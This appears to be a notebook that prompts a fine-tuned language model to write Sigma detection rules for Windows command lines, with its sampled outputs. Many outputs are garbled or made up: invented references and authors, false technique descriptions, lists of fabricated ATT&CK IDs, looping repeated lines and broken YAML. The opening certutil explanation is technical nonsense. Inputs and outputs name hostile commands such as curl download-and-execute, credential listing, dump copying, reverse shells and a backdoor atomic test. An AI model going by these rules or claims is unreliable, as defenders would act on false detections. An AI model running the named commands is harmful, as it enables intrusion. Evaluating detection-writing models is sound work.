For example:
Certutil.exe downloads a file named 1.exe which contains an EXE with the name 2.exe that contains a 3.exe with the name 3.exe that contains the flag.exe
The file flag.exe contains the flag in base64

When executed the 1.exe will execute the 2.exe which will execute the 3.exe which will decode the flag from base64 and write it to disk.

To execute the binary the 1.exe will run certutil.exe with the flag SYNCWITHWU which is missing in the SYSCALL_TABLE. This will make the code run the code in Certutil.exe without having to go through the normal code execution stack.

This was used

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\cmd.exe -c -r -k \\chcp.com

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\cmd.exe -c -r -k \chcp.com

### Response:
[DELETE THIS LINE] Ansii to unicode
Ansii to unicode
SetConsoleCP
SetConsoleOutputCP

### References:

https://twitter.com/sblmsloose/status/1517580757442092802?s=21&t=zMUg3f33B0gKzP3WwVeK5A&i=zJv5jWV15Jm3yVjJvDf0aA

https://twitter.com/sblmsloose/status/1517681167809441281?s=21&t=9Q0xO5_MX52p7hF-n4H0w&i=RqGpXqj0Gw7bxMkFUOg_8w

https://twitter.com/sblmsloose/status/1517732771533079810?s=20&t=zM3tTnYvZ5UYRVKG9WpEZQ&i=8z3jxQ4QFK7QrVZv1JJbTg

https://twitter.com/sblmsloose/status/1518059795201514499?s=20&t=wjXN7WKw9tOY_7Z2TJrKw&i=E36F3KJ_11UWb7UzRwGlA

https://twitter.com/sblmsloose/status/1518101845961272325?s=20&t=lFj586Gk1Uq8wYEvTb3g4w&i=jKnEfq0LzWVUXFgdTa56A

https://twitter.com/sblmsloose/status/1518106361442382593?s=20&t=OI6FxJJKlY6R4v5JMfBtVw&i=5D5vfQeOw9mFzH5W7xm6Q

https://twitter.com/sblmsloose/status/1518126223766072832?s=20&t=OiN32t7gqzYFk4nKn89OQQ&i=zWd3nBHoQx6NyYRz2wVx

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\chcp.com

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\chcp.com

### Response:
[RESPONSE] title: Suspicious CHCP Command
id: 8789700a-d37e-4704-b2b2-4b2c8188efcd
status: test
description: Detects execution of chcp.com with unusual values which is usually used to change the character encoding
references:
    - https://twitter.com/mrd0x/status/1429262566367753985
    - https://twitter.com/0xJH4CKER/status/1429260809279822086
author: Florian Roth (Nextron Systems), John Hawkes (OTR)
date: 2021-08-19
modified: 2023-02-09
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith: '\chcp.com'
        OriginalFileName: 'chcp.com'
    selection_cli:
        CommandLine|contains|all:
            - 'chcp'
            - '0'
            - '1'
            - '2'
            - '3'
            - '4'
            - '5'
            - '6'
            - '7'
            - '8'
            - '9

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
CIPHER.EXE \\cipher.exe /w:

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
CIPHER.EXE \cipher.exe /w:

### Response:
Analyze results:

An adversary can use CIPHER.EXE to encrypt files.
CIPHER.EXE can be abused to encrypt files before transferring it to a remote location.

Input file names can be found in the command line arguments of the tool.

Adversaries can use CIPHER.EXE to encrypt files with a password before transferring it to a remote location.

Adversaries can use CIPHER.EXE to encrypt files before transferring it to a remote location.



Additional Description:

An adversary can use CIPHER.EXE to decrypt files from a remote location.

An adversary can use CIPHER.EXE to decrypt files from a remote location.











    title: File or Folder Encryption via CIPHER.EXE
    description: Detects usage of the built-in "cipher" utility to encrypt files or folders
    author: Nasreddine Bencherchali (Nextron Systems)
    date: 2022-05-12
    tags:
        - attack.execution
        - attack.d

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\clip.exe clip.exe

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\clip.exe clip.exe

### Response:
Analyze results to get the Clipboard content
Analyze results to get the Clipboard content
Analyze results to get the Clipboard content
Analyze results to get the Clipboard content
Analyze results to get the Clipboard content
Analyze results to get the Clipboard content
Analyze results to get the Clipboard content
Analyze results to get the Clipboard content
Analyze results to get the Clipboard content
Analyze results to get the Clipboard content
Analyze results to get the Clipboard content
Analyze results to get the Clipboard content
Analyze results to get the Clipboard content
Analyze results to get the Clipboard content
Analyze results to get the Clipboard content
Analyze results to get the Clipboard content
Analyze results to get the Clipboard content
Analyze results to get the Clipboard content
Analyze results to get the Clipboard content
Analyze results to get the Clipboard content
A

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
tunnel cleanup -config -connector-id

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
tunnel cleanup -config -connector-id

### Response:
Analyze result with \tunnel\ command, that can be used by Tunneler
id: ae427d7b-5c5e-4133-9630-d47c3b0a066f
related:
    - id: b5636f9d-4897-41d8-8b8f-c1d4051d5d96
      type: obsolete
status: test
description: Detects the use of the "tunnel" command to start a tunnel based on a configuration file
references:
    - https://www.netsantrum.net/blog/2021/07/13/tunnels-and-bots/
    - https://lolbas-project.github.io/lolbas/Binaries/Tunnel/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-06-08
modified: 2023-06-08
tags:
    - attack.execution
    - attack.t1027
    - attack.defense-evasion
    - attack.t1070
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            -'tunnel '
            -'-config '
            -'-connector-id '
    condition: selection
falsepositives:
    - Uncommon usage


In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\cmdkey.exe cmdkey.exe -g -u -p

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\cmdkey.exe cmdkey.exe -g -u -p

### Response:
Analyze the results to see if there is any additional info available.

### Note:
If this rule does not detect the attack you can add new data manually like this:
- Data-New: data similar to the one you want to detect
- Status: test
- Description: description of the rule
- Recommendation: recommendation of the rule
- Source: source of the rule
- Reference: reference of the rule


## Atomic Tests

- T1556.001 - Create CloudCredentialsFile
backdoor-agent.exe (Windows)
/tmp/ (Linux)
/var/tmp/ (Linux)
/private/tmp/ (Mac)
/tmp/ (FreeBSD)
/private/tmp/ (FreeBSD)
/var/tmp/ (FreeBSD)
/usr/local/bin/ (FreeBSD)
/var/lib/jenkins/ (FreeBSD)
/var/lib/jenkins/ (FreeBSD)

**Supported Platforms:** Windows, Linux, macOS, FreeBSD




#### Run it with `command_prompt`!


```
backdoor-agent.exe -g -u -p
```







#### Run it with `sh`!


```
touch ~/cloudcredentialsfile
chmod 0600 ~/cloudcredent

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\cmdkey.exe cmdkey.exe -l

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\cmdkey.exe cmdkey.exe -l

### Response:
The command used to list all stored credentials (as described in this blog post: https://learn.microsoft.com/en-us/archive/blogs/openspecification/listing-all-stored-credentials) is cmdkey.exe. A rule to detect this activity using this command looks like this:

Input: \cmdkey.exe cmdkey.exe -l
id: 11fcf875-1994-47c1-b286-199603d45145
status: test
description: Detects the use of cmdkey.exe to list stored credentials
references:
    - https://learn.microsoft. Tags: Attack.Execution
    - https://www.microsoft.com/security/blog/2 021/12/20210225-i-like-to-be-annoying-an-autorun-trojan-targeting-windows-10/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2021-12-22
modified: 2024-12-23
tags:
    - attack.execution
    - attack.t1105
    - attack.s0011
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
         

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\cmdl32.exe CMDL32.EXE /vpn /lan

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\cmdl32.exe CMDL32.EXE /vpn /lan

### Response:
Input: cmdl32.exe /vpn /lan
id: 047e337d-32d5-444a-88a4-f09d2180a964
status: test
description: Detects the execution of cmdl32.exe with the "/vpn" and "/lan" flags. These flags are only available when the client is in a domain.
references:
    - https://twitter.com/SBousseaden/status/1545501861615752962
    - https://twitter.com/SBousseaden/status/1545502213885608706
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-01-11
modified: 2023-11-17
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        OriginalFileName: 'cmdl32.exe'
        CommandLine|contains:
            - '/vpn'
            - '/lan'
    condition: all of  # check each condition
falsepositives:
    - Unknown
level: medium





























































































In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\cmd.exe Cmd.Exe assoc

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\cmd.exe Cmd.Exe assoc

### Response:
Input: \cmd.exe Cmd.Exe assoc
id: 4b492845-d618-473d-8606-a9f47516245d
status: test
description: Detects assoc execution to hide processes.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6055e31e56b29933c8bfc15c1a/atomics/T1218/T1218.md
author: frack113
date: 2021-11-16
modified: 2023-11-24
tags:
    - attack.execution
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        OriginalFileName: 'cmd.exe'
        Image|endswith: '\cmd.exe'
        CommandLine|contains: 'assoc'
    condition: selection
falsepositives:
    - Unknown
level: medium

```





### powershell
    
```powershell
Get-WinEvent -LogName Security | where {($_.message -like "*assoc*") -and ($_.message -like "*cmd.exe*") -and ($_.message -like "*OriginalFileName:*")} | select TimeCreated,Id,RecordId,ProcessId,MachineName,Mes

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\cmd.exe Cmd.Exe copy \\\\\\\\ .dmp .dump .hdmp

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\cmd.exe Cmd.Exe copy \\\\ .dmp .dump .hdmp

### Response:
Input: \cmd.exe Cmd.Exe copy \\\\.dmp.dump.hdmp

UserAgent: Other
Id: 5c99f13a-3058-4a2a-81d4-847b543572a6
Status: test
Description: Detects the execution of dump files.
References:
    - https://www.microsoft.com/security/blog/2022/03/23/investigating-a-new-apt-group-targeting-financial-services-companies/
    - https://www
    - https://lolbas-project.github.io/lolbas/Binaries/Dump/
    - https://github.com/LOLBAS-Project/binaries/blob/469e53c9060b627211134b40862826c65b67bb24/
Author: frack113
Date: 2022-04-14
Modified: 2023-02-18
Tags:
    - attack.execution
    - attack.t1059.002
    - attack.discovery
    - attack.credential-access
    - attack.t1059.001
    - attack.t1059.003
    - attack.s0116
    - attack.defense-evasion
    - attack.privilege-escalation
    - attack.t1190
    - attack.t1078
    - attack.t1021.010
    - attack.t1562.001
    - attack.t1562.

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
-c curl http -o &

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
-c curl http -o &

### Response:
- id: 3f3894e5-47cd-4c82-a979-955f98c6f2a5
  name: Execute Command To Download And Execute Remote Binary
  description: Execute command to download and execute a remote binary.
  status: test
  tags:
    - attack.execution
    - attack.command-and-control
    - attack.t1218
  author: Nasreddine Bencherchali (Nextron Systems)
  date: 2023-06-14
  modifiers:
    description:
      - In order to execute a binary, one has to load it into memory. When a program is loaded into memory, it is first located within the program image, also called a "PDB". If the PDB is not found, the OS will search for the file in the Windows directory, and then in the Windows system directory, and then in any directories specified with the /dir flag. If the PDB is not found, Windows will attempt to load the program as a 32-bit program if it is a 64-bit process and vice-versa. This is not always the case, because som

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\cmd.exe Cmd.Exe del erase -f -s -q

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\cmd.exe Cmd.Exe del erase -f -s -q

### Response:
An attacker can leverage local file permissions to delete files that do not belong to them. This could be used to delete files that contain sensitive information, such as local credential dumps, or any other file that the attacker has obtained access to.

This technique has been used by ransomware actors in order to obfuscate the fact that they have spread the infection. (Citation: Symantec Ransomware)

Adversaries may use legitimate file deletion commands to remove files that do not belong to them.

Data Sources:
- Windows Security Event Logs
- Windows Commandline
- Process Monitoring
- Process Access

Event ID:
- 1104: Windows Commandline
- 4688: Windows Security
- 1204: Process Monitoring
- 1202: Process Access

### Possible Commands:
del erase -f -s -q

### Possible Attack Representations:

 ![](https://i.imgur. //IJZFgvE.png)

### Detection:

| OS | Command | Descrip

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\cmd.exe Cmd.Exe del erase \\\\\\ .au3 \\\\\\ .dll \\\\\\ .exe \\\\\\ .js

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\cmd.exe Cmd.Exe del erase \\\ .au3 \\\ .dll \\\ .exe \\\ .js

### Response:
Input:
- \cmd.exe
- Cmd.Exe
- del
- erase
- \\\
-.au3
- \\\
-.dll
- \\\
-.exe
- \\\
-.js

id: 6f391a08-4736-4178-8799-bf395d2e796e
status: test
description: Detects a process deleting files
references:
    - https://www.netsparker.com/blog/web-development/attacks-against-web-applications-part-1/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-11-22
modified: 2023-11-30
tags:
    - attack.defense-evasion
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - del
            - erase
            - \\\
            -.au3
            -.dll
            -.exe
            -.js
        Image|endswith:
            -.exe
            -.dll
            -.scr
    condition: selection
falsepositives:
    - False positives depend on the application an

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\cmd.exe Cmd.Exe dir -s

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

You seem to be using the pipelines sequentially on GPU. In order to maximize efficiency please use a dataset


### Instruction:
Write Sigma rule to detect payload:

### Input:
\cmd.exe Cmd.Exe dir -s

### Response:
Input: Get Current Directory
id: 92758102-81c4-4771-89a5-77694391012e
status: test
description: |
    Detects the execution of the "dir" command with the "-s" flag.
    This flag lists files that are not in the current directory.
    In other words, it shows files that are not in the directory from which the command was executed.
references:
    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Lsass
    - https://blog.talosintelligence.com/2019/05/fodder-for-thought-bypassing-user-initiated-uac-prompts-in-windows-7-8-1-10.html
    - https://isc.sans.edu/diary/22004
author: frack113
date: 2022-02-15
modified: 2023-02-03
tags:
    - attack.execution
    - attack.t1218
    - attack.defense-evasion
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'dir'
            - '-s'
    condition: select

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\cmd.exe http :// %AppData%

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\cmd.exe http :// %AppData%

### Response:
Input:

title: Suspicious AppData Environment Variable
id: 684d6e46-e555-4783-8670-a7f3e42a044a
status: test
description: Detects a suspicious environment variable being used in cmd.exe. This can be used by threat actors to obfuscate their command and control channel.
references:
    - https://app.any.run/tasks/63706214-52f8-410c-a19e-c0a7a96978a5/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2021-01-26
modified: 2022-03-06
tags:
    - attack.command-and-control
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - '%AppData%'
            - 'http'
            - ':'
            -''
            - '//'
            -''
            - '%'
            - '\"'
    condition: selection
falsepositives:
    - Unknown
level: medium




















































In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\cmd.exe Cmd.Exe mklink \\osk.exe \\cmd.exe

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\cmd.exe Cmd.Exe mklink \osk.exe \cmd.exe

### Response:
Input command: \cmd.exe Cmd.Exe mklink \osk.exe \cmd.exe
Command: \cmd.exe Cmd.Exe mklink \osk.exe \cmd.exe
Status: 0x00
OriginalFileName: cmd.exe
MD5: 0b872e6384f42b3137b190b4410027f6
Description: Detects execution of osk.exe by spawning a mklink process to osk.exe
References:
    - https://twitter.com/bohops/status/1281961671424317696
Author: '@bohops', '@tifini0', '@sbousseaden', '@fql14"
Date: 2020-07-27
Modified: 2022-02-01
Tags:
    - attack.execution
    - attack.t1218
    - attack.t1219
    - attack.defense-evasion
LogSource:
    category: process_creation
    product: windows
detection:
    selection:
        OriginalFileName: 'osk.exe'
        CommandLine:
            -'mklink'
            - 'osk.exe'
            - 'cmd.exe'
    condition: selection
falsepositives:
    - Unlikely
level: medium














    # In order to detect this behavior, we look f

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
mklink HarddiskVolumeShadowCopy

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
mklink HarddiskVolumeShadowCopy

### Response:
An attacker may abuse this capability to access the volume shadow copies in order to access sensitive data.
For example, a user who has the "backup" privilege may be able to access the contents of a volume shadow copy by creating a symbolic link to it.
Volume shadow copies can be abused to access sensitive data such as files deleted in the event of a ransomware attack.
In this case, an attacker could restore the deleted file from the volume shadow copy.
(Citation: Symantec VSS Arbitrary File Access)
Adversaries may use Volume Shadow Copies to copy or access data on systems.
Volume Shadow Copies can be used to access sensitive data such as files deleted in the event of a ransomware attack.
In this case, an attacker could restore the deleted file from the volume shadow copy.
(Citation: Symantec VSS Arbitrary File Access)

### Potential Queries:

```sql
DeviceRegistryActions
OR


In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\cmd.exe Cmd.Exe ping copy -n -y

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\cmd.exe Cmd.Exe ping copy -n -y

### Response:
Ask me tomorrow!


### Input:
\cmd.exe Cmd.Exe netsh start cmd net start /min net start /min #

### Response:
In a similar manner to the previous one you can find all the potential command you can start from a cmd prompt.

### Recommended Action:
A common technique used by attackers is to launch a reverse shell from a cmd prompt as a last resort.
Attackers can use this technique to circumvent security measures and launch a reverse shell or to simply run a command.

Attackers can also use this technique to launch their reverse shell to evade signature based detection mechanisms.

In order to detect this activity you can use the following rule:

Input: \cmd.exe Cmd.Exe netsh start cmd net start /min net start /min #
id: a541658f-e729-4e3d-9310-e7ef47d74808
status: test
description: Detects the execution of potential reverse shells starting from a cmd prompt
references:
    - h

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
-n Nul -f -q ping del

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
-n Nul -f -q ping del

### Response:
An adversary may abuse legitimate utilities to perform an operation. For example, they may use
ping to discover a target system and its related ports, and then use del to remove the ping process
in order to terminate it.
In the following example, the adversary starts a ping process and uses del to terminate it:
ping -n 100 192.168.100.111 192.168.100.112 192.168.100.113 192.168.100.114 192.168.100.115 192.168.100.116
del ping
An adversary may also use PowerShell to perform similar tasks, such as calling the Get-NetIPConfiguration Cmdlet
in order to retrieve information about the computer and its related properties:
$c = Get-NetIPConfiguration
$c | fl *
An adversary may also use PowerShell to enumerate the process and services on the system:
$p = Get-WmiObject win32_process
$s = Get-Service
$s | fl *
An adversary may also use PowerShell to enumerate the scheduled tasks on the system:
$t

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\cmd.exe Cmd.Exe rmdir /s /q

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\cmd.exe Cmd.Exe rmdir /s /q

### Response:
An adversary can use scheduled tasks and other automation methods to maintain persistence and execution within a network.
Adversaries may abuse scheduled tasks and other automation methods to maintain access to a network after an intrusion.
Remote Services, Winlogon, and other common locations may be abused to establish persistence.

Adversaries may abuse Windows Admin Shares to establish persistence.
Windows Admin Shares, sometimes referred to as Winrmi, are file shares that reside on Windows servers that are accessible remotely.
Adversaries may establish persistence and privilege escalation within an organization by establishing these shares.
(Citation: Symantec Windows Admin Shares)

Adversaries may use Group Policy Preferences to establish persistence.
Group Policy Preferences, a Windows feature, are used to make changes to registry values and other configurations on a clien

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\winlogon.exe \\cmd.exe \\cscript.exe \\mshta.exe \\powershell.exe \\pwsh.exe \\regsvr32.exe \\rundll32.exe \\wscript.exe \\wt.exe sethc.exe utilman.exe osk.exe Magnify.exe Narrator.exe DisplaySwitch.exe

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\winlogon.exe \cmd.exe \cscript.exe \mshta.exe \powershell.exe \pwsh.exe \regsvr32.exe \rundll32.exe \wscript.exe \wt.exe sethc.exe utilman.exe osk.exe Magnify.exe Narrator.exe DisplaySwitch.exe

### Response:
Not Implemented

### Notes:
Not Implemented

### Tag:
ADOBE
ATTACK_T1218
ATTACK_TECHNIQUE_1055
ATTACK_TECHNIQUE_1085
ATTACK_TECHNIQUE_1100
ATTACK_TECHNIQUE_1101
ATTACK_TECHNIQUE_1102
ATTACK_TECHNIQUE_1103
ATTACK_TECHNIQUE_1104
ATTACK_TECHNIQUE_1105
ATTACK_TECHNIQUE_1106
ATTACK_TECHNIQUE_1107
ATTACK_TECHNIQUE_1108
ATTACK_TECHNIQUE_1109
ATTACK_TECHNIQUE_1110
ATTACK_TECHNIQUE_1111
ATTACK_TECHNIQUE_1112
ATTACK_TECHNIQUE_1113
ATTACK_TECHNIQUE_1114
ATTACK_TECHNIQUE_1115
ATTACK_TECHNIQUE_1116
ATTACK_TECHNIQUE_1117
ATTACK_TECHNIQUE_1118
ATTACK_TECHNIQUE_1119
ATTACK_TECHNIQUE_1120
ATTACK_TECHNIQUE_1121
ATTACK_TECHNIQUE_1122
ATTACK_TECHNIQUE_1123
ATTACK_TECHNIQUE_1124
ATTACK_TECHNIQUE_1125
ATTACK_TECHNIQUE_1126
ATTACK_TECHNIQ

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\cmd.exe \\csrss.exe \\ctfmon.exe \\dllhost.exe \\epad.exe \\FlashPlayerUpdateService.exe \\GoogleUpdate.exe \\jucheck.exe \\jusched.exe \\LogonUI.exe \\lsass.exe \\regsvr32.exe \\SearchIndexer.exe \\SearchProtocolHost.exe \\SIHClient.exe \\sihost.exe \\slui.exe \\spoolsv.exe \\sppsvc.exe \\taskhostw.exe \\unsecapp.exe \\WerFault.exe \\wermgr.exe \\wlanext.exe \\WUDFHost.exe

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\cmd.exe \csrss.exe \ctfmon.exe \dllhost.exe \epad.exe \FlashPlayerUpdateService.exe \GoogleUpdate.exe \jucheck.exe \jusched.exe \LogonUI.exe \lsass.exe \regsvr32.exe \SearchIndexer.exe \SearchProtocolHost.exe \SIHClient.exe \sihost.exe \slui.exe \spoolsv.exe \sppsvc.exe \taskhostw.exe \unsecapp.exe \WerFault.exe \wermgr.exe \wlanext.exe \WUDFHost.exe

### Response:
Input: \cmd.exe \csrss.exe \ctfmon.exe \dllhost.exe \epad.exe \FlashPlayerUpdateService.exe \GoogleUpdate.exe \jucheck.exe \jusched.exe \LogonUI.exe \lsass.exe \regsvr32.exe \SearchIndexer.exe \SearchProtocolHost.exe \SIHClient.exe \sihost.exe \slui.exe \spoolsv.exe \sppsvc.exe \taskhostw.exe \unsecapp.exe \WerFault.exe \wermgr.exe \wlanext.exe \WUDFHost.exe
Title: Potential Suspicious Service
id: 1621d1e0-476b-4095-b5d5-e793090162e5
status: test
description: Detects a suspicious service that has not been run by a user and is not owned by a user
references:
  

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
ConfigSecurityPolicy.exe \\ConfigSecurityPolicy.exe ConfigSecurityPolicy.exe ftp:// http:// https://

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
ConfigSecurityPolicy.exe \ConfigSecurityPolicy.exe ConfigSecurityPolicy.exe ftp:// http:// https://

### Response:
ConfigSecurityPolicy.exe, with the ability to download files from the web via FTP or HTTP, can be abused to download and run arbitrary binaries from the web.

Input: \ConfigSecurityPolicy.exe ConfigSecurityPolicy.exe ftp:// http:// https://
id: 3f713558-0d61-4958-8111-0e06559e23c7
status: test
description: Detects ConfigSecurityPolicy.exe, with the ability to download files from the web via FTP or HTTP, can be abused to download and run arbitrary binaries from the web
references:
    - https://twitter.com/cyberonl/status/1617503540281684992
    - https://twitter.com/mrb3n/status/1617430003709635073
    - https://lolbas-project.github.io/lolbas/Binaries/Configsecuritypolicy/
    - https://twitter.com/mrb3n/status/1617447688675315457
    - https://learn.microsoft.com/en-us/windows/security/threat-protection/sec

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\conhost.exe CONHOST.EXE --headless powershell

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\conhost.exe CONHOST.EXE --headless powershell

### Response:
Input: \conhost.exe CONHOST.EXE --headless powershell
id: d9b71535-0072-46d9-84c7-a60f9828d327
status: test
description: Detects usage of the Headless parameter in Powershell to disable the host process and leave a headless process behind
references:
    - https://twitter.com/malcomsteele/status/1385953804713265153
    - https://www.huntressources.com/blog/headless-power-shell-and-windows-management-instrumentation-wmi/
author: 'Adam Cottlewell, @MSBuildSec, @pabraeken'
date: 2021-11-09
tags:
    - attack.defense-evasion
    - attack.t1036.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\conhost.exe'
        CommandLine|contains:
            -'--headless '
            -'powershell '
    condition: selection
falsepositives:
    - Unlikely
level: medium
---

### Data Model

Input command line a

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
conhost.exe 0xffffffff -ForceV1

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
conhost.exe 0xffffffff -ForceV1

### Response:
Input: conhost.exe 0xffffffff -ForceV1

Title: Command Shell Elevation Via Conhost.EXE
Id: 449e514a-c962-434a-b9e0-e772c726896b
Status: test
Description: Detects an elevated command shell via conhost.exe.
References:
    - https://isc.sans.edu/diary/22285
Author: @sbousseaden
Date: 2022-11-15
Tags:
    - attack.execution
    - attack.t1566
    - attack.t1566.003
LogSource:
    Category: process_creation
    Product: windows
    DataSource: image
    Query: 'Image|endswith:conhost.exe "Conhost.EXE" -ForceV1'
Field:
    Id: 218e5974-e812-488e-9559-e0449d9f6125
    Type: heuristic
    Pattern:
        - Query: 'Image|endswith:conhost.exe'
          Product: windows
          DataSource: image
          Name: Child Image is conhost
          Description: Detects an elevated command shell via conhost.exe
          References:
              - https://isc.sans.edu/diary/22285
      

In [ ]:
prompt = """### Instruction:
